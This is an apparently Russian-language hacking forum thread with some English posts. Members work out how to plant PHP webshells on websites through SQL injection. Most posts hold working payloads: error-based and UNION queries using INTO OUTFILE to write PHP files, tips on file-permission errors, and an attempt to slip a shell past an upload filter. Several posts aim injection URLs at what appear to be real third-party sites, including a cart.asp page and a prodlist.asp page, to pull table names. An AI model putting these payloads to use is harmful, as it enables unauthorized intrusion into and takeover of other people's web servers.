видимо самописная. заливаю name.php.jpg пишет что залился но судя по всему уже получается newname.jpg и открываться не хотит...
Через такую систему думаю никак, т.к она сама потом переименовывает независимо от того, какое название. Но, возможно, есть функция "переименовать" и т.п
Не получается залить шел. Хотя путь к директории сайта знаю и привилегия на файл mysql пользователя YES. Может прав нет к папке www? как действовать?
Через скуль инъекцию в пост запросе. Code: 1' and (select 1 from(select count(*),concat((SELECT "<?php phpinfo(); ?>" INTO OUTFILE "/адрес/файл.php"),floor(rand(0)*2 ))x from information_schema.tables group by x)a); --
Code: https://ventosavineyardscom.terrasite.com/cart.asp?Add=1+and%201=%28select%20top%201%20table_name%20from%20information.schema.tables%20where%20Table_name%20not%20in%20%28%27Events%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27%29%29 No admin table? Always this error: Code: Incorrect syntax near the keyword 'schema'. Only schema showing, why?
Вы наверное сейчас опять скажете что я не понял поста, ну да бог с ним Ерор бейс это просто название, причём не самой скули, а варианта её эксплуатации . А шелл залить можно везде где есть возможность сделать подзапрос (и даже без него). Просто навороты лишние ни к чему в запросе. snet
Code: select user from mysql.user where [B]1 and (select 1 into outfile '/tmp/test.txt' lines terminated by "<?php lalalalala; ?>")--+[/B] #1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'into outfile '/tmp/test.txt' lines terminated by "<?php lalalalala; ?>")--' at line 1 Не вводи в заблуждение пользователей, и прежде чем ответить на вопрос, будь добр протестируй это где-нибудь.
Ну если МОА не видит что ошибка СИНТАКСИСА, тут я бессилен Запрос рабочий, если всё сделать правильно
Да все норм, вывела ошибка: Code: Can't create/write to file '/адрес/файл.php' (Errcode: 13) Осталось найти папку где есть права. Спасибо вам обоим. lightangel, "Thank you" does not smudge on bread. Give me a plus for the reputation
Ух. В случае snet, всё элементарно, результат первого запроса, попадает во второй запрос, почему и невозможно раскрутить скуль обычным способом, и приходится использовать вывод в ошибке. Но для залития шелла, достаточно выполнить запрос: SELECT column FROM table WHERE columns = false UNION SELECT 'test' INTO OUTFILE '/tmp/file.txt' и при условии если директория доступна на запись для пользователя mysql, то первый запрос выполнится, файл успешно создастся. Но в примере уважаемого пользователя KolosJey, ничего не получится, т.к. в данном подзапросе and (select 1 into outfile '/tmp/test.txt' lines terminated by "text") использование INTO OUTFILE нарушает синтаксис запроса, о чем и свидетельствует ошибка: #1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'into outfile Ну если ОБЫЧНЫЕ ПОЛЬЗОВАТЕЛИ не научатся думать СВОЕЙ головой, тут я бессилен.
Я бы даже сказал, варианта вывода на экран результата запроса. Если запрос направлен не на получение информации, а на внесение изменений (в файлы или базу), то без разницы, блайнд или нет. Людям свойственно иногда ошибаться. Мы же не роботы. "через еррор-бейсед нельзя залить шелл" (c) Expl0ited
Спасибо что так суетитесь из-за моей проблемы Действительно, вы оба правы. Можно было обычным способом отправить запрос: union select 1,2,3,4,"blabla" into outfile "/asd", . это 3 часовое ковыряние через error_base мне запудрило всю голову и я, почему-то, ограничил себя только им. Но и вариант который привел КолосДжей тоже сработал. Записал его в свой справочник. Очень познавательно.
Is there a way to inject this? Code: http://www.sheltonhitch.com/prodlist.asp?catId=1074%27%20having%201=1 Nothing is working for me.
